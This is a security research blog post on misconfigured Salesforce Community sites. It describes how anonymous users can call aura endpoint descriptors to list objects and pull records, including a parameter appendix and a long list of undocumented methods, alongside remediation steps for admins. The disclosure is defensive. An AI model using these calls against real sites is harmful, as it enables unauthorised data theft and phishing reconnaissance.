Blog Data Security

Abusing Misconfigured Salesforce Communities for Recon and Data Theft

Our research team has discovered numerous publicly accessible Salesforce Communities that are misconfigured and expose sensitive information.
Nitay Bachrach
10 min read
Last updated August 20, 2024

Contents

     

    Originally posted August 10, 2021.

    Executive Summary

    A misconfigured Salesforce Community may lead to sensitive Salesforce data being exposed to anyone on the internet. Anonymous users can query objects that contain sensitive information such as customer lists, support cases, and employee email addresses.

    This isn’t the first, nor the last time a SaaS configuration will create a potential security incident, underscoring the need for security teams to continually assess their SaaS exposure.

    This guide explains how an attacker can exploit the misconfiguration and gives Salesforce admins detailed steps to:

    1. Ensure your guest profile permissions don’t expose things you don’t want to be exposed (account records, employee calendars, etc.)
    2. Disable API access for your guest profile
    3. Set the default owner for records created by guest users
    4. Enable secure guest user access

    Impact

    At a minimum, a malicious actor could exploit this misconfiguration to perform recon for a spear-phishing campaign. At worst, they could steal sensitive information about the business, its operations, clients, and partners.

    In some cases, a sophisticated attacker may be able to move laterally and retrieve information from other services that are integrated with a Salesforce account.

    What are Salesforce Communities?

    A Salesforce Community site lets your customers and partners interface with your Salesforce instance from outside your organization —they can open support tickets, ask questions, manage their subscriptions, and much more.

    Communities are public-facing and, by default, indexed by Google. While this is useful for customers and partners, it makes it easy for attackers to discover public communities.

    As you will see, Salesforce is highly customizable and can be difficult to administer. No two Salesforce instances are the same, with hundreds of third-party apps, custom objects, and configurations.

    Technical Background

    Salesforce communities run on Salesforce’s Lightning framework. Lightning is a rapid development framework for mobile and desktop sites.

    Salesforce Lightning is a component-oriented framework. Those components, called aura components, are self-contained objects that a developer can assemble to create custom web pages.

    Aura components can be used to perform actions on Salesforce objects—such as viewing or updating records. Components have controllers that export different methods to perform certain tasks.

    Browsing a community site with a proxy service, such as Burp suite, shows us Lightning in action. The front-end web UI of a community uses the HTTP endpoint /s/sfsites/aura.

    The browser uses the aura endpoint to retrieve information about the site and perform server-side actions as the user interacts with the community site. Naturally, the user’s permissions apply to these actions.

    Browsing Salesforce with Burp Suite

    Calling the aura endpoint is simply an HTTP request, either GET or POST, which consists of the following parameters:

    • pageURI – the path to the site, without the host. For example: “/s/”.
    • token – the current user’s token. The value of “undefined” indicates a guest user.
    • context – the current session’s context, provided by the site.
    • message – describes the desired action. It is possible to execute numerous methods in the same aura call. This structure contains a list of actions, which contain the method’s descriptor (a unique identifier of the method) and the call parameters.

    The message structure is a URL-encoded JSON. Here is an example:

    
{
  "actions": [
    {
      "id": "222;a",
      "descriptor": "serviceComponent://ui.force.components.controllers.hostConfig.HostConfigController/ACTION$getConfigData ",
      "callingDescriptor": "UNKNOWN",
      "params": {}
    }
  ]
}
    • id – a random string that can be used when sending more than one action in a single request. That way the browser can match actions and responses.
    • descriptor – the specific method to call.
    • callingDescriptor – Usually “UNKNOWN,” as this parameter is often ignored
    • params – Used to provide parameters to the method

    There are many different methods an unauthenticated user can execute to perform actions, such as:

    • Get information about the site
    • Get information about the Salesforce subscription
    • View default and custom objects and their fields
    • Retrieve data and records

    Some of the objects you can query are Account, User, Case, Employee, Attachment, Contact, and Lead if access has been granted to the guest user.

    How can attackers exploit misconfigured communities?

    In misconfigured sites, the attacker can perform recon by looking for information about the organization, like users, objects, and fields that expose names and email addresses, and in many cases, they can access the system or steal information.

    First, the attacker must find a community site to exploit. Some Google magic will do the trick. There are common URL “fingerprints” that will indicate a website is powered by Salesforce Communities:

    • /s/topic
    • /s/article
    • /s/contactsupport

    Let me Google that for you

    Using operators such as “inurl:” together with the name of the target for example, one can often find the desired community site:

    Google search with inurl parameter

    The next step is to retrieve information about the site. The attacker can do that by calling the following method:

    
serviceComponent://ui.force.components.controllers.hostConfig.HostConfigController/ACTION$getConfigData

    This method returns the domain of the organization, some security settings (e.g., allowed content security policy (CSP) domains), and available objects.

    The attacker can call different methods to perform different actions such as:

    • Listing Salesforce objects
    • Listing records
    • Searching for records
    • Retrieving an object
    • Fetching information about the salesforce instance

    Fetching sensitive data

    Attackers can try to access sensitive data directly. Our security team has found troves of exposed sensitive records in our research.

    The attacker can target specific objects and examine them by calling the method:

    
aura://RecordUiController/ACTION$getObjectInfo

    Which returns information about an object. This method supports all kinds of objects including custom ones.

    The information includes the different fields, how they are configured, and the child relationships of the object.

    The next step would be listing the records using the method:

    
serviceComponent://ui.force.components.controllers.lists.selectableListDataProvider.SelectableListDataProviderController/ACTION$getItems.

    Here’s an example of listing Account records using this method:

    The attacker can then fetch even more information using methods such as:

    
serviceComponent://ui.force.components.controllers.recordGlobalValueProvider.RecordGvpController/ACTION$getRecord

    or

    
aura://RecordUiController/ACTION$getRecordWithFields

    To fetch interesting records with more fields and related objects.

    Hunting for vulnerable third-party components

    An advanced adversary might try to attack vulnerable custom and 3rd party components.

    When browsing the site, we can see that the browser loads several different JavaScript files with weird URLs, which begin with /l/ and then an encoded JSON object.

    In these JavaScript files, we can find the definitions for the most accessible endpoints, including custom ones and/or third-party applications. The definitions are encoded in JSON:

    
{
  "descriptor": "compound://my_app.Component",
  "ac": [
    {
      "n": "doAction",
      "descriptor": "apex://my_app.ComponentController/ACTION$doAction",
      "at": "SERVER",
      "rt": "apex://String",
      "pa": [],
      "st": true
    }
  ],
  "pa": [
    {
      "name": "paramName",
      "type": "apex://String"
    }
  ]
}

    By scanning the response for similarly formed JSON strings, one can learn about the custom methods and how to call them.

    What can you do about it?

    Managing a community site is a tough job. It is important to make sure that anonymous guest users and community users can only access intended and required records. There is info that you may want to share with the world and others that you don’t.

    To secure your Salesforce environment, it is very important to adhere to the principle of least privilege and ensure that guest profiles only allow the minimum required permissions.

    Step 1 – Audit your guest profile permissions

    Navigate to your Site Builder (search for “All Sites” in the setup) and click on Settings or the gear icon on the left.

    You will find your guest user profile under General. Click on it to modify the guest user’s permissions.

    Here you can control field-level security to control access at a very granular level. This is where you will need to make decisions about access that are specific to your business needs.

    Step 2 – Disable API access

    It’s important to ensure that API enabled is unchecked. It’s recommended to disable Access Activities as well.

    It is important to continuously monitor guest and community user permissions and sharing roles and to keep an eye on the records they own (and their related objects) to ensure sensitive information does not become publicly accessible.

    Step 3 – Set a default owner for records created by guest users

    Either go directly to your site’s workspaces, or use the site builder to navigate to the Administration workspace:

    Under preferences, make sure that you set up a default owner for records created by guest users and, in most cases, you’ll want to turn off Let guest users see members of this site.

    Step 4 – Enable secure guest user record access

    Verify that the default access setting for guest users is secure: go to setup, and search for Sharing Settings. There look for the option Secure guest user record access and verify that it’s checked.

    Salesforce is trying to help you make smart decisions about guest access. As of the Summer ’20 release, Salesforce has made it impossible to disable this setting. They’ve also now prevented you from granting guest users the View All Users permissions and you can’t give them access to view all data.

    It’s still of utmost importance, however, to review configuration settings. Salesforce cannot disable them all for you because different users have different requirements.

    Wrapping up

    As you can see, with SaaS applications as complex and customizable as Salesforce there are countless configuration settings and permissions to worry about.

    Most organizations deploy dozens of sanctioned SaaS applications, each with its own objects, permissions models, APIs, and sharing features.

    This is why we built DatAdvantage Cloud-to provide a unified way to find exposures, right-size privileges, and perform investigations across all your sanctioned SaaS applications.

    Appendix: Aura descriptors and how to use them

    
serviceComponent://ui.force.components.controllers.hostConfig.HostConfigController/ACTION$getConfigData
    • No parameters

    Gets the app data, including a list of objects which often includes custom objects, and the Salesforce login domain.

    
serviceComponent://ui.global.components.one.one.controller.OneController/ACTION$getCurrentApp
    • No parameters

    Gets more information about the app including an extended list of objects

    
aura://RecordUiController/ACTION$getObjectInfo
    • ObjectApiName (String) – the name of the object

    This function returns the definition of the object: its fields, its relationships, and configuration.

    
serviceComponent://ui.force.components.controllers.lists.selectableListDataProvider.SelectableListDataProviderController/ACTION$getItems
    • entityNameOrId (String) – the name of the object to list. For example: “Account” or “User”
    • pageSize (Int) – Number of records to retrieve. Up to 1000
    • currentPage(int) – If there are more than pageSize records, use this to get the next pages.
    • getCount (Boolean) – whether the total number of records should be retrieved.
    • layoutType (String) – The layout. Provide “FULL” to get more data
    • enableRowActions(Boolean) – true
    • useTimeout (Boolean) – false

    Lists records of the specified objects.

    
serviceComponent://ui.force.components.controllers.recordGlobalValueProvider.RecordGvpController/ACTION$getRecord
    • recordDescriptor(string) – the record “descriptor” – use the following format:
    
{id}.undefined.null.null.null.Id.VIEW.false.null.{fields}.null
    • Id – the id of the record to retrieve, fields – a comma-separated of fields to return. Replace all dots “.” with “;2”. For example:
    
00500000000XxXXWXX.undefined.null.null.null.Id.VIEW.false.null.Name,CreateBy;2Name.null

    Other undocumented endpoints

    • aura://ActionsController/ACTION$getActionLayout
    • aura://ActionsController/ACTION$getGlobalActions
    • aura://ActionsController/ACTION$getListViewActions
    • aura://ActionsController/ACTION$getLookupActions
    • aura://ActionsController/ACTION$getMRUListActions
    • aura://ActionsController/ACTION$getObjectCreateActions
    • aura://ActionsController/ACTION$getQuickActionDefaults
    • aura://ActionsController/ACTION$getRecordActions
    • aura://ActionsController/ACTION$getRecordEditActions
    • aura://ActionsController/ACTION$getRelatedListActions
    • aura://ActionsController/ACTION$getRelatedListRecordActions
    • aura://ActionsController/ACTION$getRelatedListsActions
    • aura://ApexActionController/ACTION$execute
    • aura://AppsController/ACTION$getNavItems
    • aura://CanvasController/ACTION$getCanvasData
    • aura://CommerceCatalogController/ACTION$getProduct
    • aura://CommerceCatalogController/ACTION$getProductCategoryPath
    • aura://CommerceImporterController/ACTION$importProducts
    • aura://CommerceSearchController/ACTION$searchProducts
    • aura://CommerceStorePricingController/ACTION$getProductPrice
    • aura://ComponentController/ACTION$getApplication
    • aura://ComponentController/ACTION$getApplicationDef
    • aura://ComponentController/ACTION$getComponent
    • aura://ComponentController/ACTION$getComponentDef
    • aura://ComponentController/ACTION$getComponents
    • aura://ComponentController/ACTION$getDefinitions
    • aura://ComponentController/ACTION$getEventDef
    • aura://ComponentController/ACTION$loadLabels
    • aura://ComponentController/ACTION$reportDeprecationUsages
    • aura://ComponentController/ACTION$reportFailedAction
    • aura://ComponentController/ACTION$reportUsages
    • aura://ConversationController/ACTION$getConversationCallStructureAndInsights
    • aura://DynamicComponentController/ACTION$getTemplateDescriptorWithExpansionBundle
    • aura://HostConfigController/ACTION$getConfigData
    • aura://LabelController/ACTION$getLabel
    • aura://LightningExperienceAssistantPlatformController/ACTION$getActiveQuestionnaires
    • aura://LightningExperienceAssistantPlatformController/ACTION$getActiveScenarios
    • aura://LightningExperienceAssistantPlatformController/ACTION$getAssistant
    • aura://LightningExperienceAssistantPlatformController/ACTION$getQuestionnaire
    • aura://LightningExperienceAssistantPlatformController/ACTION$saveAssistant
    • aura://LightningExperienceAssistantPlatformController/ACTION$saveQuestionnaire
    • aura://LinkedInSalesNavigatorController/ACTION$getSalesAccessToken
    • aura://LinkedInSalesNavigatorController/ACTION$getSignupUrl
    • aura://ListUiController/ACTION$getListInfoById
    • aura://ListUiController/ACTION$getListInfoByName
    • aura://ListUiController/ACTION$getListRecordsById
    • aura://ListUiController/ACTION$getListRecordsByName
    • aura://ListUiController/ACTION$getListUiById
    • aura://ListUiController/ACTION$getListUiByName
    • aura://ListUiController/ACTION$getListsByObjectName
    • aura://LookupController/ACTION$getLookupRecords
    • aura://ManagedContentController/ACTION$getManagedContentByTopicsAndContentKeys
    • aura://ManagedContentController/ACTION$getPublishedManagedContentListByContentKey
    • aura://MruListUiController/ACTION$getMruListInfo
    • aura://MruListUiController/ACTION$getMruListRecords
    • aura://MruListUiController/ACTION$getMruListUi
    • aura://NavEventManagerController/ACTION$getClassicNonSetupPageReferenceMappings
    • aura://NavEventManagerController/ACTION$getClassicSetupPageReferenceMappings
    • aura://NavEventManagerController/ACTION$getResolvedIntegrationUrl
    • aura://NavigationMenuController/ACTION$getCommunityNavigationMenu
    • aura://OrchestrationController/ACTION$getOrchestrationInstance
    • aura://OrchestrationController/ACTION$getOrchestrationInstanceCollection
    • aura://OrchestrationController/ACTION$publishOrchestrationEvent
    • aura://RecordMruController/ACTION$updateMru
    • aura://RecordUiController/ACTION$createRecord
    • aura://RecordUiController/ACTION$deleteRecord
    • aura://RecordUiController/ACTION$executeAggregateUi
    • aura://RecordUiController/ACTION$executeGraphQL
    • aura://RecordUiController/ACTION$findDuplicates
    • aura://RecordUiController/ACTION$getAggregateUi
    • aura://RecordUiController/ACTION$getDedupeConfig
    • aura://RecordUiController/ACTION$getDuplicateConfig
    • aura://RecordUiController/ACTION$getFormByName
    • aura://RecordUiController/ACTION$getLayout
    • aura://RecordUiController/ACTION$getLayoutUserState
    • aura://RecordUiController/ACTION$getObjectInfo
    • aura://RecordUiController/ACTION$getObjectInfos
    • aura://RecordUiController/ACTION$getPicklistValues
    • aura://RecordUiController/ACTION$getPicklistValuesByRecordType
    • aura://RecordUiController/ACTION$getRecordAvatars
    • aura://RecordUiController/ACTION$getRecordCloneDefaults
    • aura://RecordUiController/ACTION$getRecordCreateDefaults
    • aura://RecordUiController/ACTION$getRecordDefaultsTemplateClone
    • aura://RecordUiController/ACTION$getRecordDefaultsTemplateForCreate
    • aura://RecordUiController/ACTION$getRecordUis
    • aura://RecordUiController/ACTION$getRecordWithFields
    • aura://RecordUiController/ACTION$getRecordWithLayouts
    • aura://RecordUiController/ACTION$getRecordsWithFields
    • aura://RecordUiController/ACTION$getRecordsWithLayouts
    • aura://RecordUiController/ACTION$getValidationRulesInfo
    • aura://RecordUiController/ACTION$postRecordAvatarAssociation
    • aura://RecordUiController/ACTION$updateLayoutUserState
    • aura://RecordUiController/ACTION$updateRecord
    • aura://RelatedListUiController/ACTION$getRelatedListInfo
    • aura://RelatedListUiController/ACTION$getRelatedListInfoBatch
    • aura://RelatedListUiController/ACTION$getRelatedListInfoByApiName
    • aura://RelatedListUiController/ACTION$getRelatedListInfoCollection
    • aura://RelatedListUiController/ACTION$getRelatedListRecordCount
    • aura://RelatedListUiController/ACTION$getRelatedListRecords
    • aura://RelatedListUiController/ACTION$getRelatedListRecordsBatch
    • aura://RelatedListUiController/ACTION$getRelatedListsRecordCount
    • aura://RelatedListUiController/ACTION$updateRelatedListInfoByApiName
    • aura://SearchGridLWCController/ACTION$updateUserColumnWidthPref
    • aura://SeoPropertiesController/ACTION$getRecordSeoProperties
    • aura://SitesController/ACTION$searchSite
    • aura://StyleController/ACTION$applyTokens
    • aura://WaveController/ACTION$deleteDataset
    • aura://WaveController/ACTION$deleteRecipe
    • aura://WaveController/ACTION$executeQueryByInputRep
    • aura://WaveController/ACTION$getAnalyticsLimits
    • aura://WaveController/ACTION$getDataflowJob
    • aura://WaveController/ACTION$getDataflowJobNode
    • aura://WaveController/ACTION$getDataflowJobNodes
    • aura://WaveController/ACTION$getDataflowJobs
    • aura://WaveController/ACTION$getDataflowJobsByDataflowId
    • aura://WaveController/ACTION$getDataset
    • aura://WaveController/ACTION$getDatasets
    • aura://WaveController/ACTION$getRecipe
    • aura://WaveController/ACTION$getRecipes
    • aura://WaveController/ACTION$getReplicatedDatasets
    • aura://WaveController/ACTION$getSchedule
    • aura://WaveController/ACTION$getWaveFolders
    • aura://WaveController/ACTION$getXmd
    • aura://WaveController/ACTION$startDataflow
    • aura://WaveController/ACTION$updateDataflowJob
    • aura://WaveController/ACTION$updateSchedule
    • serviceComponent://ui.chatter.components.aura.components.forceChatter.groups.actions.EditGroupNotificationSettingsController/ACTION$getNotificationSettings
    • serviceComponent://ui.chatter.components.aura.components.forceChatter.groups.actions.EditGroupNotificationSettingsController/ACTION$setNotificationSettings
    • serviceComponent://ui.chatter.components.messages.MessagesController/ACTION$addParticipants
    • serviceComponent://ui.chatter.components.messages.MessagesController/ACTION$createMessage
    • serviceComponent://ui.chatter.components.messages.MessagesController/ACTION$getMessagesDetail
    • serviceComponent://ui.chatter.components.messages.MessagesController/ACTION$getMessagesListData
    • serviceComponent://ui.chatter.components.messages.MessagesController/ACTION$getMessagingPermAndPref
    • serviceComponent://ui.chatter.components.messages.MessagesController/ACTION$getMoreReplies
    • serviceComponent://ui.chatter.components.messages.MessagesController/ACTION$getRichTextConfig
    • serviceComponent://ui.chatter.components.messages.MessagesController/ACTION$getUserDetails
    • serviceComponent://ui.chatter.components.messages.MessagesController/ACTION$removeParticipants
    • serviceComponent://ui.comm.runtime.components.aura.components.siteforce.controller.PubliclyCacheableAttributeLoaderController/ACTION$getComponentAttributes
    • serviceComponent://ui.comm.runtime.components.aura.components.siteforce.controller.PubliclyCacheableComponentLoaderController/ACTION$getAudienceTargetedPageComponent
    • serviceComponent://ui.comm.runtime.components.aura.components.siteforce.controller.PubliclyCacheableComponentLoaderController/ACTION$getPageComponent
    • serviceComponent://ui.comm.runtime.components.aura.components.siteforce.network.tracking.NetworkTrackingController/ACTION$createLogRecord
    • serviceComponent://ui.comm.runtime.components.aura.components.siteforce.qb.QuarterbackController/ACTION$getBootstrapCacheExpiration
    • serviceComponent://ui.comm.runtime.components.aura.components.siteforce.qb.QuarterbackController/ACTION$getTopicDescription
    • serviceComponent://ui.comm.runtime.components.aura.components.siteforce.qb.QuarterbackController/ACTION$isValidSObjectId
    • serviceComponent://ui.comm.runtime.components.aura.components.siteforce.qb.QuarterbackController/ACTION$setCurrentApp
    • serviceComponent://ui.comm.runtime.components.aura.components.siteforce.qb.QuarterbackController/ACTION$validateRoute
    • serviceComponent://ui.comm.runtime.components.aura.components.siteforce.recordservicecomponent.RecordServiceComponentController/ACTION$getActionOverrides
    • serviceComponent://ui.comm.runtime.components.aura.components.siteforce.recordservicecomponent.RecordServiceComponentController/ACTION$getArticleUrlNameAndVersionId
    • serviceComponent://ui.comm.runtime.components.aura.components.siteforce.recordservicecomponent.RecordServiceComponentController/ACTION$getArticleVersionId
    • serviceComponent://ui.comm.runtime.components.aura.components.siteforce.recordservicecomponent.RecordServiceComponentController/ACTION$getCMSContentTypeAndURLName
    • serviceComponent://ui.comm.runtime.components.aura.components.siteforce.recordservicecomponent.RecordServiceComponentController/ACTION$getCMSContentTypeUrlnameAndId
    • serviceComponent://ui.comm.runtime.components.aura.components.siteforce.recordservicecomponent.RecordServiceComponentController/ACTION$getCategoryPath
    • serviceComponent://ui.comm.runtime.components.aura.components.siteforce.recordservicecomponent.RecordServiceComponentController/ACTION$getNameFieldValue
    • serviceComponent://ui.comm.runtime.components.aura.components.siteforce.recordservicecomponent.RecordServiceComponentController/ACTION$getPersonAccountIdFromContactId
    • serviceComponent://ui.comm.runtime.components.aura.components.siteforce.recordservicecomponent.RecordServiceComponentController/ACTION$isAllowViewEditConvertedLeadsOn
    • serviceComponent://ui.comm.runtime.components.aura.components.siteforce.service.ServiceBodyController/ACTION$getTopicImageUrlFromContextId
    • serviceComponent://ui.communities.components.aura.components.forceCommunity.baseSearch.BaseSearchController/ACTION$getCrossObjectDeflection
    • serviceComponent://ui.communities.components.aura.components.forceCommunity.controller.DeflectionDataProviderController/ACTION$getArticleDeflection
    • serviceComponent://ui.communities.components.aura.components.forceCommunity.controller.DeflectionDataProviderController/ACTION$getCombinedDeflection
    • serviceComponent://ui.communities.components.aura.components.forceCommunity.controller.DeflectionDataProviderController/ACTION$getCrossObjectDeflection
    • serviceComponent://ui.communities.components.aura.components.forceCommunity.controller.DeflectionDataProviderController/ACTION$getQuestionDeflection
    • serviceComponent://ui.communities.components.aura.components.forceCommunity.controller.LWCRecordDetailController/ACTION$getInitData
    • serviceComponent://ui.communities.components.aura.components.forceCommunity.controller.OmniBoxController/ACTION$getTopic
    • serviceComponent://ui.communities.components.aura.components.forceCommunity.controller.OmniBoxController/ACTION$getTopicFromEntityId
    • serviceComponent://ui.communities.components.aura.components.forceCommunity.controller.OmniBoxController/ACTION$getTopicFromUrl
    • serviceComponent://ui.communities.components.aura.components.forceCommunity.navigationMenu.NavigationMenuDataProviderController/ACTION$getNavigationMenu
    • serviceComponent://ui.communities.components.aura.components.forceCommunity.signalCollector.SignalCollectorController/ACTION$sendSignals
    • serviceComponent://ui.force.components.controllers.action.ActionController/ACTION$getServerSideComponent
    • serviceComponent://ui.force.components.controllers.dedupe.DedupeManagerController/ACTION$findMatches
    • serviceComponent://ui.force.components.controllers.dedupe.DedupeManagerController/ACTION$getConfig
    • serviceComponent://ui.force.components.controllers.dedupe.DedupeManagerController/ACTION$loadObjectApiInfo
    • serviceComponent://ui.force.components.controllers.dedupe.DedupeManagerController/ACTION$loadRecords
    • serviceComponent://ui.force.components.controllers.detail.DetailController/ACTION$cloneRecordWithRelatedEntities
    • serviceComponent://ui.force.components.controllers.detail.DetailController/ACTION$getDetailComponent
    • serviceComponent://ui.force.components.controllers.detail.DetailController/ACTION$getEntityConfig
    • serviceComponent://ui.force.components.controllers.detail.DetailController/ACTION$getNextRecordLayout
    • serviceComponent://ui.force.components.controllers.detail.DetailController/ACTION$getPostSaveNavigationEvent
    • serviceComponent://ui.force.components.controllers.detail.DetailController/ACTION$getRecord
    • serviceComponent://ui.force.components.controllers.detail.DetailController/ACTION$saveSectionState
    • serviceComponent://ui.force.components.controllers.dynamicLabel.UiDynamicLabelProviderController/ACTION$getLabel
    • serviceComponent://ui.force.components.controllers.hostConfig.HostConfigController/ACTION$getConfigData
    • serviceComponent://ui.force.components.controllers.inlineEdit.InlineEditController/ACTION$getNameField
    • serviceComponent://ui.force.components.controllers.inlineEdit.InlineEditController/ACTION$getPostSaveNavigationEvent
    • serviceComponent://ui.force.components.controllers.logoutHandler.LogoutHandlerController/ACTION$getLogoutURL
    • serviceComponent://ui.force.components.controllers.recordGlobalValueProvider.RecordGvpController/ACTION$createQuickActionRecords
    • serviceComponent://ui.force.components.controllers.recordGlobalValueProvider.RecordGvpController/ACTION$createRecord
    • serviceComponent://ui.force.components.controllers.recordGlobalValueProvider.RecordGvpController/ACTION$deleteRecord
    • serviceComponent://ui.force.components.controllers.recordGlobalValueProvider.RecordGvpController/ACTION$getRecord
    • serviceComponent://ui.force.components.controllers.recordGlobalValueProvider.RecordGvpController/ACTION$saveQuickActionRecords
    • serviceComponent://ui.force.components.controllers.recordGlobalValueProvider.RecordGvpController/ACTION$saveRecord
    • serviceComponent://ui.force.components.controllers.recordGlobalValueProvider.RecordGvpController/ACTION$saveRecords
    • serviceComponent://ui.force.components.controllers.recordLayoutBroker.RecordLayoutBrokerController/ACTION$getLayout
    • serviceComponent://ui.force.components.controllers.recordLayoutBroker.RecordLayoutBrokerController/ACTION$getRecordAndLayout
    • serviceComponent://ui.force.impl.aura.components.force.recordEditActions.RecordEditActionsController/ACTION$getEditActions
    • serviceComponent://ui.global.components.one.actionsManager.ActionsManagerController/ACTION$handleAction
    • serviceComponent://ui.identity.components.sessiontimeoutwarn.SessionTimeoutWarnController/ACTION$getSessionRefreshAction
    • serviceComponent://ui.identity.components.sessiontimeoutwarn.SessionTimeoutWarnController/ACTION$getSessionTimeoutConfig
    • serviceComponent://ui.instrumentation.components.beacon.InstrumentationBeaconController/ACTION$getLocators
    • serviceComponent://ui.instrumentation.components.beacon.InstrumentationBeaconController/ACTION$sendData
    • serviceComponent://ui.search.components.forcesearch.sgdp.MRUCacheController/ACTION$getGlobalMrus
    • serviceComponent://ui.search.components.forcesearch.sgdp.PermsAndPrefsCacheController/ACTION$getPermsAndPrefs
    • serviceComponent://ui.search.components.forcesearch.sgdp.ResultsFiltersCacheController/ACTION$getResultsFilterMetadata
    • serviceComponent://ui.search.components.forcesearch.sgdp.ScopesCacheController/ACTION$getEntityLabels
    • serviceComponent://ui.search.components.forcesearch.sgdp.ScopesCacheController/ACTION$getEntityNames
    • serviceComponent://ui.search.components.forcesearch.sgdp.ScopesCacheController/ACTION$getScopeMaps
    • serviceComponent://ui.self.service.components.profileMenu.ProfileMenuController/ACTION$getContextUserPhotoUrlAndUpdatedName
    • serviceComponent://ui.self.service.components.profileMenu.ProfileMenuController/ACTION$getProfileMenuResponse
    • serviceComponent://ui.sfa.components.nativeimport.ImportButtonController/ACTION$getConfig

    What should I do now?

    Below are three ways you can continue your journey to reduce data risk at your company:

    1

    Schedule a demo with us to see Varonis in action. We'll personalize the session to your org's data security needs and answer any questions.

    2

    See a sample of our Data Risk Assessment and learn the risks that could be lingering in your environment. Varonis' DRA is completely free and offers a clear path to automated remediation.

    3

    Follow us on LinkedIn, YouTube, and X (Twitter) for bite-sized insights on all things data security, including DSPM, threat detection, AI security, and more.

    Nitay Bachrach
    Nitay Bachrach Nitay is a security researcher based in Tel Aviv, but you might encounter him anywhere in world. He is a cloud security expert, highly experienced in offensive security operations and reverse engineering. Nitay’s expertise also includes IoT devices, Linux, and local network security.

    Try Varonis free.

    Get a detailed data risk report based on your company’s data.
    Deploys in minutes.
    Get started View sample

    Keep reading

    Varonis tackles hundreds of use cases, making it the ultimate platform to stop data breaches and ensure compliance.

    data-theft-in-salesforce:-manipulating-public-links
    Data Theft in Salesforce: Manipulating Public Links
    data-theft-in-salesforce:-manipulating-public-links
    Nitay Bachrach
    September 16, 2024
    Varonis Threat Labs uncovered a vulnerability in Salesforce's public link feature that threat actors could exploit to retrieve sensitive data.
    active-directory-resource-center
    Active Directory Resource Center
    active-directory-resource-center
    Michael Buckbee
    July 28, 2020
    Active Directory is the basis of many enterprise networks. Learn some of the basics about AD in this guide.
    what-is-a-brute-force-attack?
    What is a Brute Force Attack?
    what-is-a-brute-force-attack?
    Michael Buckbee
    July 20, 2021
    A brute force attack (also known as brute force cracking) is the cyberattack equivalent of trying every key on your key ring, and eventually finding the right one. The most basic brute force attack is a dictionary attack, where the attacker works through a dictionary of possible passwords and tries them all.
    outlook-vulnerability-discovery-and-new-ways-to-leak-ntlm-hashes
    Outlook Vulnerability Discovery and New Ways to Leak NTLM Hashes
    outlook-vulnerability-discovery-and-new-ways-to-leak-ntlm-hashes
    Dolev Taler
    January 18, 2024
    Varonis Threat Labs discovered a new Outlook exploit and three new ways to access NTLM v2 hashed passwords.